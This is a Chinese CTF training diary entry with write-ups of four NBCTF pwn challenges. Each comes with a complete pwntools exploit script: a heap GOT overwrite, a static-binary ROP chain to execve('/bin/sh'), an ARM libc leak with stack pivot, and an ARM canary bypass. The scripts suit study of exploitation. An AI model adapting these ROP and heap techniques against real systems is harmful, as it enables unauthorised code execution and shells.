CTF特训日记day2

day2打了一个叫NBCTF的比赛

做了四个题,剩下五道arm的题不会做了,关注一下wp,也许可以靠这个比赛提升一波异架构能力。

heapnotes

2.31简单堆题,没啥好说的,直接改got就行了

python 复制代码
from re import L
from pwn import *
from ctypes import *
from struct import pack
from io import BytesIO
import binascii
from PIL import Image
#context.log_level = 'debug'
context.arch='amd64'
#io=process("./pwn")
#io = remote("tamuctf.com", 443, ssl=True, sni="encryptinator")
io=remote('chal.nbctf.com',30172)
#io = process(['./pwn'],env={"LD_PRELOAD":"./libc64.so"})
elf=ELF('./pwn')
#io = remote('arm.nc.jctf.pro', 17916)
#io=process(["qemu-ppc", "-g", "4321", "./pwn"])
#io=process(["qemu-aarch64",  "-L", "/usr/aarch64-linux-gnu", "./pwn"])
#print("please start gdb")
#s=raw_input()
libc = ELF('./libc.so.6')
#libc = ELF('./libc-2.31.so')
rl = lambda    a=False        : io.recvline(a)
ru = lambda a,b=True    : io.recvuntil(a,b)
rn = lambda x            : io.recvn(x)
sn = lambda x            : io.send(x)
sl = lambda x            : io.sendline(x)
sa = lambda a,b            : io.sendafter(a,b)
sla = lambda a,b        : io.sendlineafter(a,b)
irt = lambda            : io.interactive()
dbg = lambda text=None  : gdb.attach(io, text)
# lg = lambda s,addr        : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s,addr))
lg = lambda s            : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s)))
uu32 = lambda data        : u32(data.ljust(4, b'\x00'))
uu64 = lambda data        : u64(data.ljust(8, b'\x00'))
def menu(choice):
    sla("> ",str(choice))
def add(context):
    menu(1)
    sla("Input note data: ",context)
def show(index):
    menu(2)
    sla("): ",str(index))
def edit(index,context):
    menu(3)
    sla("): ",str(index))
    sla("Input note data: ",context)
def free(index):
    menu(4)
    sla("): ",str(index))

bss=0x404120
add('/bin/sh\x00')
add('a'*8)
add('/bin/sh\x00')
free(0)
free(1)
show(1)
heapbase=u64(io.recvline()[:-1].ljust(8,'\x00'))-0x2a0
lg("heapbase")
edit(1,'a'*0x10)
free(1)
add(p64(0x404020))
add('a'*8)
add(p64(elf.plt['system']))
show(2)
#gdb.attach(io)
irt()

ribbit

直接写rop硬拿shell就好,不用管它什么所谓的win函数,反正程序是静态编译的,什么gadget都有

python 复制代码
from re import L
from pwn import *
from ctypes import *
from struct import pack
from io import BytesIO
import binascii
from PIL import Image
#context.log_level = 'debug'
context.arch='amd64'
#io=process("./pwn")
#io=gdb.debug('./pwn','b*0x401922')
io=remote("chal.nbctf.com",30170)
#io = remote("tamuctf.com", 443, ssl=True, sni="encryptinator")
#io=remote('chal.nbctf.com',30172)
#io = process(['./pwn'],env={"LD_PRELOAD":"./libc64.so"})
elf=ELF('./pwn')
#io = remote('arm.nc.jctf.pro', 17916)
#io=process(["qemu-ppc", "-g", "4321", "./pwn"])
#io=process(["qemu-aarch64",  "-L", "/usr/aarch64-linux-gnu", "./pwn"])
#print("please start gdb")
#s=raw_input()
#libc = ELF('./libc.so.6')
#libc = ELF('./libc-2.31.so')
rl = lambda    a=False        : io.recvline(a)
ru = lambda a,b=True    : io.recvuntil(a,b)
rn = lambda x            : io.recvn(x)
sn = lambda x            : io.send(x)
sl = lambda x            : io.sendline(x)
sa = lambda a,b            : io.sendafter(a,b)
sla = lambda a,b        : io.sendlineafter(a,b)
irt = lambda            : io.interactive()
dbg = lambda text=None  : gdb.attach(io, text)
# lg = lambda s,addr        : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s,addr))
lg = lambda s            : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s)))
uu32 = lambda data        : u32(data.ljust(4, b'\x00'))
uu64 = lambda data        : u64(data.ljust(8, b'\x00'))
rdi_ret=0x000000000040201f
rsi_ret=0x000000000040a04e
rdx_ret=0x000000000047fe1a
rax_ret=0x0000000000449267
win=0x401825
puts=0x40c7b0
t_read=0x448800
bss=0x4C6800
syscall=0x0000000000401dd4

payload='a'*0x28+p64(rdi_ret)+p64(0)+p64(rsi_ret)+p64(bss)+p64(rdx_ret)+p64(8)+p64(t_read)+p64(rdi_ret)+p64(bss)+p64(rsi_ret)+p64(0)+p64(rdx_ret)+p64(0)+p64(rax_ret)+p64(59)+p64(syscall)
#payload='You got this!'+'\x00'*8+'Just do it!'+'\x00'*8+p64(rdi_ret)+p64(0xF10C70B33F)+p64(rax_ret)+p64(rsi_ret)+p64(win)
sla("Can you give my pet frog some motivation to jump out the hole?",payload)
io.send('/bin/sh\x00')
irt()

ret2thumb

用自己的qemu-arm就可以直接怼shellcode,用它给的就不行,有点奇怪,而且每天东这个题和thumb有什么关系,直接泄露libc然后栈迁移到bss上直接rop就行,不过要事先找到能控制r0的gadget,直接ROPgadget搜只能搜到控制fp,r3和r4的gadget,但是仔细找的话会发现如果把0x10500地址处的mov r0,r3;pop {fp,pc} 和pop {r3,pc}结合起来的话是可以做到直接控制r0的这也是为什么可以直接泄露libc去进行rop的原因

python 复制代码
from re import L
from pwn import *
from ctypes import *
from struct import pack
from io import BytesIO
import binascii
from PIL import Image
#context.log_level = 'debug'
context.arch='arm'

#io=process("./pwn")
#io = remote("tamuctf.com", 443, ssl=True, sni="encryptinator")
io=remote('chal.nbctf.com',30175)
#io = process(['./pwn'],env={"LD_PRELOAD":"./libc64.so"})
elf=ELF('./pwn')
#io = remote('arm.nc.jctf.pro', 17916)
#io=process(["qemu-ppc", "-g", "4321", "./pwn"])
#io=process(["./qemu-arm",  "-g","4321","-L", ".", "./pwn"])
#io=process(["./qemu-arm",  "-L", ".", "./pwn"])
#print("please start gdb")
s=raw_input()
libc = ELF('./libc.so.6')
#libc = ELF('./libc-2.31.so')
rl = lambda    a=False        : io.recvline(a)
ru = lambda a,b=True    : io.recvuntil(a,b)
rn = lambda x            : io.recvn(x)
sn = lambda x            : io.send(x)
sl = lambda x            : io.sendline(x)
sa = lambda a,b            : io.sendafter(a,b)
sla = lambda a,b        : io.sendlineafter(a,b)
irt = lambda            : io.interactive()
dbg = lambda text=None  : gdb.attach(io, text)
# lg = lambda s,addr        : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s,addr))
lg = lambda s            : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s)))
uu32 = lambda data        : u32(data.ljust(4, b'\x00'))
uu64 = lambda data        : u64(data.ljust(8, b'\x00'))
main=0x10510
bss=0x12600
gadget=0x104F0
r3_pc=0x00010388
r0_r3=0x10550
payload='a'*0x20+p32(bss)+p32(r3_pc)+p32(elf.got['puts'])+p32(r0_r3)+p32(bss+0x24)+p32(gadget)+p32(0)+p32(bss)
sla("Can you ret2thumb? \n",payload)
libcbase=u64(io.recvline()[:-1].ljust(8,'\x00'))-libc.sym['puts']
lg("libcbase")
#shellcode=asm(shellcraft.thumb.sh())
system=libcbase+libc.sym['system']
payload='a'*0x24+p32(r3_pc)+p32(bss+0x38)+p32(r0_r3)+p32(bss)+p32(system)+'/bin/sh\x00'
io.sendline(payload)
irt()

canary-in-a-coal-mine

程序给了gets,还给了在栈上写某条从已知地址出发的链上的任意一个数据,有canary,给了后门,所以直接用大量后门地址覆盖栈然后利用给的功能在bss找一个能指向canary的地址写到对应位置上绕过canary保护就可

python 复制代码
from re import L
from pwn import *
from ctypes import *
from struct import pack
from io import BytesIO
import binascii
from PIL import Image
context.log_level = 'debug'
context.arch='arm'

#io=process("./pwn")
#io = remote("tamuctf.com", 443, ssl=True, sni="encryptinator")
io=remote('chal.nbctf.com',30178)
#io = process(['./pwn'],env={"LD_PRELOAD":"./libc64.so"})
elf=ELF('./pwn')
#io = remote('arm.nc.jctf.pro', 17916)
#io=process(["qemu-ppc", "-g", "4321", "./pwn"])
#io=process(["./qemu-arm",  "-g","4321","-L", ".", "./pwn"])
#io=process(["./qemu-arm",  "-L", ".", "./pwn"])
#print("please start gdb")
s=raw_input()
libc = ELF('./libc.so.6')
#libc = ELF('./libc-2.31.so')
rl = lambda    a=False        : io.recvline(a)
ru = lambda a,b=True    : io.recvuntil(a,b)
rn = lambda x            : io.recvn(x)
sn = lambda x            : io.send(x)
sl = lambda x            : io.sendline(x)
sa = lambda a,b            : io.sendafter(a,b)
sla = lambda a,b        : io.sendlineafter(a,b)
irt = lambda            : io.interactive()
dbg = lambda text=None  : gdb.attach(io, text)
# lg = lambda s,addr        : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s,addr))
lg = lambda s            : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s)))
uu32 = lambda data        : u32(data.ljust(4, b'\x00'))
uu64 = lambda data        : u64(data.ljust(8, b'\x00'))
win=0x10828
def menu(choice):
    sla("> ",str(choice))
def mine(index,depth):
    menu(1)
    sla("mining position\n> ",str(index))
    sla("mining depth\n> ",str(depth))
def extract(index):
    menu(2)
    sla("minecart number\n> ",str(index))
def gets(payload):
    menu(3)
    sla("collapsing mineshaft\n> ",payload)
payload=p32(win+1)*0x20
gets(payload)
guard=0x21038
mine(0x21038,2)
extract(8)
menu(4)
irt()
相关推荐
ccc_9wy8 分钟前
暗月红队考核靶场ack123的测试报告[细节](二)
网络安全·暗月ack123·socks5内网代理·mssql漏洞·杀软对抗·制作免杀木马·烂土豆提权
鸭梨山大。1 小时前
Jenkins安全部署规范及安全基线
安全·中间件·jenkins
网安-轩逸2 小时前
网络安全核心目标CIA
安全·web安全
鸭梨山大。3 小时前
Jenkins 任意文件读取(CVE-2024-23897)修复及复现
安全·中间件·jenkins
黑客老陈4 小时前
新手小白如何挖掘cnvd通用漏洞之存储xss漏洞(利用xss钓鱼)
运维·服务器·前端·网络·安全·web3·xss
代码改变世界ctw10 小时前
如何学习Trustzone
安全·trustzone·atf·optee·tee·armv8·armv9
WTT001113 小时前
2024楚慧杯WP
大数据·运维·网络·安全·web安全·ctf
群联云防护小杜15 小时前
如何给负载均衡平台做好安全防御
运维·服务器·网络·网络协议·安全·负载均衡
ihengshuai15 小时前
HTTP协议及安全防范
网络协议·安全·http
蜜獾云16 小时前
linux firewalld 命令详解
linux·运维·服务器·网络·windows·网络安全·firewalld